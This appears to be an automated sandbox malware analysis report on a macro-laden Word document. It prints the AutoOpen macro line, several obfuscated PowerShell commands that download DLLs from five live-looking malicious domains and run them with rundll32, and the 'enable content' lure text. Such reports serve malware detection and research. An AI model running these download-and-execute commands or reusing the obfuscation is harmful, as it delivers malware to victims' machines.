Play interactive tour

Edit tour

Windows Analysis Report diagram-884.doc

Overview

General Information

Sample Name:	diagram-884.doc
Analysis ID:	484600
MD5:	3d6a59b2463cbae2e8cd5cc4d0859477
SHA1:	10ecd94e610b89337e384a29ce3fdf77526f2a33
SHA256:	e4aa5d33b7c3c4cd956735f32316bf58002882ae37a46c8d6acc8921fdcc8f11
Tags:	doc
Infos:
Most interesting Screenshot:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Document exploit detected (creates forbidden files)

Antivirus detection for URL or domain

Document contains an embedded VBA macro which may execute processes

Sigma detected: Microsoft Office Product Spawning Windows Shell

Machine Learning detection for sample

Microsoft Office drops suspicious files

Document contains an embedded macro with GUI obfuscation

Sigma detected: WScript or CScript Dropper

Document contains VBA stomped code (only p-code) potentially bypassing AV detection

Document exploit detected (process start blacklist hit)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Stores large binary data to the registry

Document contains an embedded VBA macro which executes code when the document is opened / closed

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Uses insecure TLS / SSL version for HTTPS connection

Contains long sleeps (>= 3 min)

Enables debug privileges

Potential document exploit detected (unknown TCP traffic)

Document contains embedded VBA macros

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Potential document exploit detected (performs HTTP gets)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 2564 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

cmd.exe (PID: 3040 cmdline: cmd /k cscript.exe C:\ProgramData\pin.vbs MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

cscript.exe (PID: 3052 cmdline: cscript.exe C:\ProgramData\pin.vbs MD5: ECB021CA3370582F0C7244B0CF06732C)

powershell.exe (PID: 1348 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://gvmedicine.com/c8lDPI7K/ca.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; MD5: 852D67A27E454BD389FA7F02A8CBE23F)

powershell.exe (PID: 2180 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanoz='JOOEX'.replace('JOO','I');sal OY $Nanoz;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://scriptcaseblog.com.br/8KhqnNaE4UB/ca.html'',''C:\ProgramData\www2.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; MD5: 852D67A27E454BD389FA7F02A8CBE23F)

powershell.exe (PID: 2676 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanox='JOOEX'.replace('JOO','I');sal OY $Nanox;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://srdm.in/0K6dTttd/ca.html'',''C:\ProgramData\www3.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; MD5: 852D67A27E454BD389FA7F02A8CBE23F)

powershell.exe (PID: 2624 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://sharayuprakashan.com/90qJEVeD0VAw/ca.html'',''C:\ProgramData\www4.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; MD5: 852D67A27E454BD389FA7F02A8CBE23F)

powershell.exe (PID: 2184 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://venturefiling.com/yP2brxfli/ca.html'',''C:\ProgramData\www5.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY; MD5: 852D67A27E454BD389FA7F02A8CBE23F)

cmd.exe (PID: 2596 cmdline: 'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www1.dll,ldr MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

rundll32.exe (PID: 1296 cmdline: rundll32.exe C:\ProgramData\www1.dll,ldr MD5: DD81D91FF3B0763C392422865C9AC12E)

cmd.exe (PID: 448 cmdline: 'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www2.dll,ldr MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

rundll32.exe (PID: 2676 cmdline: rundll32.exe C:\ProgramData\www2.dll,ldr MD5: DD81D91FF3B0763C392422865C9AC12E)

cmd.exe (PID: 2248 cmdline: 'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www3.dll,ldr MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

rundll32.exe (PID: 1712 cmdline: rundll32.exe C:\ProgramData\www3.dll,ldr MD5: DD81D91FF3B0763C392422865C9AC12E)

cmd.exe (PID: 1532 cmdline: 'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www4.dll,ldr MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

rundll32.exe (PID: 2928 cmdline: rundll32.exe C:\ProgramData\www4.dll,ldr MD5: DD81D91FF3B0763C392422865C9AC12E)

cmd.exe (PID: 2628 cmdline: 'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www5.dll,ldr MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

rundll32.exe (PID: 2396 cmdline: rundll32.exe C:\ProgramData\www5.dll,ldr MD5: DD81D91FF3B0763C392422865C9AC12E)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
diagram-884.doc	Office_AutoOpen_Macro	Detects an Microsoft Office file that contains the AutoOpen Macro function	Florian Roth	0x262d6:$s1: AutoOpen 0x2760a:$s1: AutoOpen 0x44980:$s2: Macros

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: cmd /k cscript.exe C:\ProgramData\pin.vbs, CommandLine: cmd /k cscript.exe C:\ProgramData\pin.vbs, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2564, ProcessCommandLine: cmd /k cscript.exe C:\ProgramData\pin.vbs, ProcessId: 3040

Sigma detected: WScript or CScript Dropper

Show sources

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: cscript.exe C:\ProgramData\pin.vbs, CommandLine: cscript.exe C:\ProgramData\pin.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: cmd /k cscript.exe C:\ProgramData\pin.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3040, ProcessCommandLine: cscript.exe C:\ProgramData\pin.vbs, ProcessId: 3052

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://gvmedicine.com/c8lDPI7K/ca.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://gvmedicine.com/c8lDPI7K/ca.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;, CommandLine|base64offset|contains: 9, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cscript.exe C:\ProgramData\pin.vbs, ParentImage: C:\Windows\System32\cscript.exe, ParentProcessId: 3052, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://gvmedicine.com/c8lDPI7K/ca.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;, ProcessId: 1348

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: diagram-884.doc

ReversingLabs: Detection: 22%

Antivirus detection for URL or domain

Show sources

Source: https://scriptcaseblog.com.br/8KhqnNaE4UB/ca.html

Avira URL Cloud: Label: malware

Machine Learning detection for sample

Show sources

Source: diagram-884.doc

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 192.185.115.199:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 204.11.58.87:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 149.56.235.225:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 204.11.58.87:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 204.11.58.87:443 -> 192.168.2.22:49171 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\ProgramData\pin.vbs

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\cmd.exe

Source: global traffic

DNS query: name: srdm.in

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 192.185.115.199:443

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 192.185.115.199:443

Source: winword.exe

Memory has grown: Private usage: 0MB later: 64MB

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Source: global traffic	HTTP traffic detected: GET /c8lDPI7K/ca.html HTTP/1.1Host: gvmedicine.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8KhqnNaE4UB/ca.html HTTP/1.1Host: scriptcaseblog.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /0K6dTttd/ca.html HTTP/1.1Host: srdm.inConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /90qJEVeD0VAw/ca.html HTTP/1.1Host: sharayuprakashan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /yP2brxfli/ca.html HTTP/1.1Host: venturefiling.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 204.11.58.87 204.11.58.87
Source: Joe Sandbox View	IP Address: 204.11.58.87 204.11.58.87

Source: unknown	HTTPS traffic detected: 192.185.115.199:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 204.11.58.87:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 149.56.235.225:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 204.11.58.87:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 204.11.58.87:443 -> 192.168.2.22:49171 version: TLS 1.0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443

Source: powershell.exe, 00000005.00000002.459165390.000000001CBE0000.00000002.00020000.sdmp, rundll32.exe, 00000012.00000002.508566082.0000000001B70000.00000002.00020000.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000005.00000002.446168949.000000000039E000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: powershell.exe, 00000005.00000002.458931022.000000001B7AC000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000005.00000002.458968211.000000001B7DB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000005.00000002.458931022.000000001B7AC000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000005.00000002.458968211.000000001B7DB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000005.00000002.458931022.000000001B7AC000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000005.00000002.458931022.000000001B7AC000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000005.00000002.459165390.000000001CBE0000.00000002.00020000.sdmp, rundll32.exe, 00000012.00000002.508566082.0000000001B70000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000005.00000002.459165390.000000001CBE0000.00000002.00020000.sdmp, rundll32.exe, 00000012.00000002.508566082.0000000001B70000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.459507532.000000001CDC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000005.00000002.459507532.000000001CDC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.458931022.000000001B7AC000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000005.00000002.458931022.000000001B7AC000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000005.00000002.458931022.000000001B7AC000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000005.00000002.458931022.000000001B7AC000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000005.00000002.458931022.000000001B7AC000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000005.00000002.458931022.000000001B7AC000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000005.00000002.458968211.000000001B7DB000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: cscript.exe, 00000004.00000002.473930287.0000000003FD0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.447234641.00000000022C0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: cscript.exe, 00000004.00000002.473418612.0000000001C00000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: powershell.exe, 00000005.00000002.459507532.000000001CDC7000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.459507532.000000001CDC7000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: cscript.exe, 00000004.00000002.473930287.0000000003FD0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.447234641.00000000022C0000.00000002.00020000.sdmp, powershell.exe, 00000007.00000002.447254921.0000000002400000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000005.00000002.458968211.000000001B7DB000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000005.00000002.458931022.000000001B7AC000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000005.00000002.459165390.000000001CBE0000.00000002.00020000.sdmp, rundll32.exe, 00000012.00000002.508566082.0000000001B70000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: powershell.exe, 00000005.00000002.459507532.000000001CDC7000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000005.00000002.459165390.000000001CBE0000.00000002.00020000.sdmp, rundll32.exe, 00000012.00000002.508566082.0000000001B70000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000007.00000002.446371900.000000000030E000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000007.00000002.446530536.000000000033A000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://w
Source: powershell.exe, 00000007.00000002.446371900.000000000030E000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: rundll32.exe, 00000012.00000002.508566082.0000000001B70000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.455060505.00000000038D7000.00000004.00000001.sdmp	String found in binary or memory: https://gvmedicine.com
Source: powershell.exe, 00000005.00000002.454758061.000000000372D000.00000004.00000001.sdmp	String found in binary or memory: https://gvmedicine.com/c8lDPI
Source: powershell.exe, 00000005.00000002.454758061.000000000372D000.00000004.00000001.sdmp	String found in binary or memory: https://gvmedicine.com/c8lDPI7
Source: powershell.exe, 00000005.00000002.454758061.000000000372D000.00000004.00000001.sdmp	String found in binary or memory: https://gvmedicine.com/c8lDPI7K/
Source: powershell.exe, 00000005.00000002.449768654.0000000002D81000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.446870017.00000000005F4000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.446579609.0000000000401000.00000004.00000020.sdmp	String found in binary or memory: https://gvmedicine.com/c8lDPI7K/ca.html
Source: powershell.exe, 00000005.00000002.454758061.000000000372D000.00000004.00000001.sdmp	String found in binary or memory: https://gvmedicine.com/c8lDPI7K/ca.htmlPE
Source: powershell.exe, 00000007.00000002.454544318.000000000368D000.00000004.00000001.sdmp	String found in binary or memory: https://scriptcaseblog.com.br
Source: powershell.exe, 00000007.00000002.454544318.000000000368D000.00000004.00000001.sdmp	String found in binary or memory: https://scriptcaseblog.com.br/
Source: powershell.exe, 00000007.00000002.454544318.000000000368D000.00000004.00000001.sdmp	String found in binary or memory: https://scriptcaseblog.com.br/8K
Source: powershell.exe, 00000007.00000002.454544318.000000000368D000.00000004.00000001.sdmp	String found in binary or memory: https://scriptcaseblog.com.br/8KhqnNaE4UB/ca.html
Source: powershell.exe, 00000007.00000002.454544318.000000000368D000.00000004.00000001.sdmp	String found in binary or memory: https://scriptcaseblog.com.br/8KhqnNaE4UB/ca.htmlPE
Source: powershell.exe, 00000005.00000002.458931022.000000001B7AC000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: cscript.exe, 00000004.00000003.472478494.00000000000F1000.00000004.00000001.sdmp, cscript.exe, 00000004.00000002.472826283.00000000000F2000.00000004.00000001.sdmp, cscript.exe, 00000004.00000002.473372169.0000000000416000.00000004.00000001.sdmp, cscript.exe, 00000004.00000002.473349969.00000000003D4000.00000004.00000040.sdmp	String found in binary or memory: https://sharayuprakashan.com/90qJEVeD0VAw/ca.html
Source: cscript.exe, 00000004.00000003.472381236.000000000014A000.00000004.00000001.sdmp, cscript.exe, 00000004.00000003.472292697.0000000000145000.00000004.00000001.sdmp, cscript.exe, 00000004.00000002.472826283.00000000000F2000.00000004.00000001.sdmp, cscript.exe, 00000004.00000002.473372169.0000000000416000.00000004.00000001.sdmp, cscript.exe, 00000004.00000002.473349969.00000000003D4000.00000004.00000040.sdmp	String found in binary or memory: https://srdm.in/0K6dTttd/ca.html
Source: cscript.exe, 00000004.00000002.473349969.00000000003D4000.00000004.00000040.sdmp, cscript.exe, 00000004.00000002.473130325.000000000013F000.00000004.00000001.sdmp	String found in binary or memory: https://venturefiling.com/yP2brxfli/ca.html

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1960F7F0-F768-4A99-BA9A-679D126DC5D5}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: srdm.in

Source: global traffic	HTTP traffic detected: GET /c8lDPI7K/ca.html HTTP/1.1Host: gvmedicine.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8KhqnNaE4UB/ca.html HTTP/1.1Host: scriptcaseblog.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /0K6dTttd/ca.html HTTP/1.1Host: srdm.inConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /90qJEVeD0VAw/ca.html HTTP/1.1Host: sharayuprakashan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /yP2brxfli/ca.html HTTP/1.1Host: venturefiling.comConnection: Keep-Alive

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Document image extraction number: 0	Screenshot OCR: Enable editing in yellow bar above Once you have enabled editing, please click Enable content
Source: Document image extraction number: 0	Screenshot OCR: document is protected 1l Open the document /" 1 _ i; Microsoft Office /" 2 ) P eviewing online is
Source: Document image extraction number: 0	Screenshot OCR: protected documents If this document was downloaded from your email, please click 3 Enable edit
Source: Document image extraction number: 0	Screenshot OCR: Enable content.from the yellow bar above
Source: Document image extraction number: 1	Screenshot OCR: document is protected Open the document 1 in Microsoft Office Previewing onhne ts 2 not availab\
Source: Document image extraction number: 1	Screenshot OCR: Enable content.from the yellow bar above
Source: Screenshot number: 8	Screenshot OCR: Enable editingtn yellow bar above Once you have enabled ediung, please click Enable content.f
Source: Screenshot number: 8	Screenshot OCR: document is protected Open the document 1 In Microsoft Office 2 Previewing onhne is not availabl
Source: Screenshot number: 8	Screenshot OCR: protected documents If this document was downloaded from your 3 email, please click Enable edit
Source: Screenshot number: 8	Screenshot OCR: Enable content.from the yellow bar above a S
Source: Screenshot number: 16	Screenshot OCR: Enable editingtn yellow bar above Once you have enabled ediung, please click Enable content.f
Source: Screenshot number: 16	Screenshot OCR: document is protected Open the document 1 In Microsoft Office 2 Previewing onhne is not availabl
Source: Screenshot number: 16	Screenshot OCR: protected documents If this document was downloaded from your 3 email, please click Enable edit
Source: Screenshot number: 16	Screenshot OCR: Enable content.from the yellow bar above a S O I @ 100% G) A GE)

Document contains an embedded VBA macro which may execute processes

Show sources

Source: diagram-884.doc

OLE, VBA macro line: fun = Shell("cmd /k cscript.exe C:\ProgramData\pin.vbs", Chr(48))

Microsoft Office drops suspicious files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\ProgramData\pin.vbs

Jump to behavior

Document contains an embedded macro with GUI obfuscation

Show sources

Source: diagram-884.doc

Stream path 'Macros/Form/o' : Found suspicious string wscript.shell in non macro stream

Source: diagram-884.doc, type: SAMPLE

Matched rule: Office_AutoOpen_Macro date = 2015-05-28, hash5 = 7c06cab49b9332962625b16f15708345, hash4 = a3035716fe9173703941876c2bde9d98, hash3 = 66e67c2d84af85a569a04042141164e6, hash2 = 63f6b20cb39630b13c14823874bd3743, author = Florian Roth, description = Detects an Microsoft Office file that contains the AutoOpen Macro function, hash7 = 25285b8fe2c41bd54079c92c1b761381, hash6 = bfc30332b7b91572bfe712b656ea8a0c, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4d00695d5011427efc33c9722c61ced2

Source: diagram-884.doc	OLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function AutoOpen

Source: diagram-884.doc

OLE indicator, VBA macros: true

Source: diagram-884.doc

ReversingLabs: Detection: 22%

Source: C:\Windows\System32\cscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\cmd.exe	Console Write: .........................................................................1B.T.............BJ......BJ............................................
Source: C:\Windows\System32\cmd.exe	Console Write: ................................C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.>.........H.........AJ.... .CJ............8.......(.................AJ....
Source: C:\Windows\System32\cscript.exe	Console Write: ................................B.......(.P.............................f........................................................g..............

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe cmd /k cscript.exe C:\ProgramData\pin.vbs
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\ProgramData\pin.vbs
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://gvmedicine.com/c8lDPI7K/ca.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanoz='JOOEX'.replace('JOO','I');sal OY $Nanoz;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://scriptcaseblog.com.br/8KhqnNaE4UB/ca.html'',''C:\ProgramData\www2.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanox='JOOEX'.replace('JOO','I');sal OY $Nanox;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://srdm.in/0K6dTttd/ca.html'',''C:\ProgramData\www3.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX\|OY;
